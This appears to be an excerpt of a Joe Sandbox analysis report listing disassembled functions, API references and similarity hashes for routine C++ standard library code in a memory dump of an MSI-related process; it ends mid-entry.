                                                                                                                                                                                                                                                                      Function 00FC2678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC267F
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2689
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 00FC26C3
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC26DA
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC26FA
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2750803064-0
                                                                                                                                                                                                                                                                      • Opcode ID: b46f4c9e467f091af139567c7bfb6c0a020668c8e638dff574bb31fc5e87c4c0
                                                                                                                                                                                                                                                                      • Instruction ID: 40c1fc8d6b98836f825a31d057e4b0d93e39f90c36dc5ab6a0f5b808cbb6bd94
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b46f4c9e467f091af139567c7bfb6c0a020668c8e638dff574bb31fc5e87c4c0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8901A17190021ADFCB16EBA4CD42BBDB765AF84720F24040DE50067281CF789E01FBA1
                                                                                                                                                                                                                                                                      Function 00FCE8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCE8DF
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCE8E9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 00FCE923
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCE93A
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCE95A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2750803064-0
                                                                                                                                                                                                                                                                      • Opcode ID: b04ef6d79e3b14f5370efa40eaf55aa06999920c2c08b406a69f4b2bdf91c252
                                                                                                                                                                                                                                                                      • Instruction ID: d1c7a57b656d34271472a3fb6325837d00407c2f845daccfbb86d9ccdb573ca9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b04ef6d79e3b14f5370efa40eaf55aa06999920c2c08b406a69f4b2bdf91c252
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2001A171D0021ADBCB15EBA4D942BBE7765BF80720F25050DE5006B281CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FCE843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCE84A
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCE854
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FCE88E
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCE8A5
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCE8C5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1007100420-0
                                                                                                                                                                                                                                                                      • Opcode ID: 74d2a561e54a2b5e898d5a600e98a57140de509d6ff768b1d20616a18716354c
                                                                                                                                                                                                                                                                      • Instruction ID: b3dcdb38149361b54b8c2b6a729b35a0b9c7555a21f2bf50f96997f8591eae57
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74d2a561e54a2b5e898d5a600e98a57140de509d6ff768b1d20616a18716354c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B016176D0011ADBCB15FBA4DD42BAE7765AF84710F24440DF5016B2D1CF789E05EB92
                                                                                                                                                                                                                                                                      Function 00FC29F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC29FD
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2A07
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC2A41
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2A58
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2A78
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: d189ee5d3b3d19dd38679a41d974725718c37b40331bf27ab605cd5c7db43ff9
                                                                                                                                                                                                                                                                      • Instruction ID: 82d9c5226eb3af949324f514cddf5682160f4043aaaf4f6cce80ee37ae52d1f7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d189ee5d3b3d19dd38679a41d974725718c37b40331bf27ab605cd5c7db43ff9
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9601C47190021ADBCB16EBA4CD46BBE7766EF84720F24040DF50067291CF789E02EB91
                                                                                                                                                                                                                                                                      Function 00FC2961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2968
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2972
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC29AC
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC29C3
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC29E3
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: 77945cd0bfbd23bb3c66c1bb8801cf7c337c0b51a6b0535fd3f556fd11f7303b
                                                                                                                                                                                                                                                                      • Instruction ID: 6081bcf43659cbcd1affcbd29d95a697d3c8948705f106aab269f91038b1a7b4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77945cd0bfbd23bb3c66c1bb8801cf7c337c0b51a6b0535fd3f556fd11f7303b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A018072D0021ADBCB16EBA4DD42BBE7B65AF84720F24450DF5106B292DF789E01FB91
                                                                                                                                                                                                                                                                      Function 00FCEA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEA9E
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEAA8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FCEAE2
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEAF9
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEB19
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0a0a921f6e11130d02c16bc49e456e977cc943083ff33afadc6a633290c8931a
                                                                                                                                                                                                                                                                      • Instruction ID: bf053a2fadfe67c0de34b2d662e02ae0fb169a0b371d424c63c84f4d2d60387a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a0a921f6e11130d02c16bc49e456e977cc943083ff33afadc6a633290c8931a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01A172D0011ADBCB15EBA4D942BBE7765BF80720F24040DE50167292CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FC2A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2A92
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2A9C
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC2AD6
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2AED
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2B0D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: ced2b18ea3eb914d6193e01037a704f467bd13675c78b5855a7ee32b2a8c130d
                                                                                                                                                                                                                                                                      • Instruction ID: a1b68668a4ae6cace6533c8c24ba32305325a869928b530c6e888d596b8c8bb9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ced2b18ea3eb914d6193e01037a704f467bd13675c78b5855a7ee32b2a8c130d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C801617290021ADFCB16EFA4D942BAE7765AF84720F24440EE50067292CF789E02EB91
                                                                                                                                                                                                                                                                      Function 00FCEB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEB33
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEB3D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FCEB77
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEB8E
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEBAE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5930bc00e4dad03c6dd262025b247d32f1267c9e97aa0ae5ad18ea90ae5aa99b
                                                                                                                                                                                                                                                                      • Instruction ID: af62d77b76af90714a8810a7f8eea26ba75a3c7d65d2ee5d533dba6309a5852c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5930bc00e4dad03c6dd262025b247d32f1267c9e97aa0ae5ad18ea90ae5aa99b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A01A17290011ADBCB15EBA4DD82BBEB765AF84720F24040EE5116B291CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FC2B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2B27
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2B31
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 00FC2B6B
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2B82
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2BA2
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 419941038-0
                                                                                                                                                                                                                                                                      • Opcode ID: 41ca992306b4c070713464551df103f5725b5f496a1a4af0e4a68e1610989c87
                                                                                                                                                                                                                                                                      • Instruction ID: d3b1c53d400e732d5cd3638a1085670f2c7e01b2fa29e178804b0a6d52ce8903
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41ca992306b4c070713464551df103f5725b5f496a1a4af0e4a68e1610989c87
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5015E7590021ADBCB15FBA49942BAD7775AF84720F24040DE50467291DF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FC2D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2D7B
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2D85
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 00FC2DBF
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2DD6
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2DF6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 743221004-0
                                                                                                                                                                                                                                                                      • Opcode ID: 06043b6263cb5e238710bc3172855a89d77ece0fc3eb31d0b7c5e563d831c461
                                                                                                                                                                                                                                                                      • Instruction ID: c1e7254e342c3d3e99dc64a8e5a98e009046875182befedb1f7214fd6755e964
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06043b6263cb5e238710bc3172855a89d77ece0fc3eb31d0b7c5e563d831c461
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F401A175D0021ADBCB16EBA0D942BBD7765BF94720F24040DE51167291CF789A01EB91
                                                                                                                                                                                                                                                                      Function 00FD2C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                      • RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,00FB2427,0100E638,00FF6B40), ref: 00FD2D0C
                                                                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,00FB2427,0100E638,00FF6B40), ref: 00FD2D18
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3916383385-0
                                                                                                                                                                                                                                                                      • Opcode ID: bb4c46ddc35d12d83be402e24fd6375497e2ddcd9213e3c03b20c4011913a350
                                                                                                                                                                                                                                                                      • Instruction ID: bfd3c2badae8ad8bb928f3c8f5df394fcce24d2baee802868e0a9f92b95c6a6f
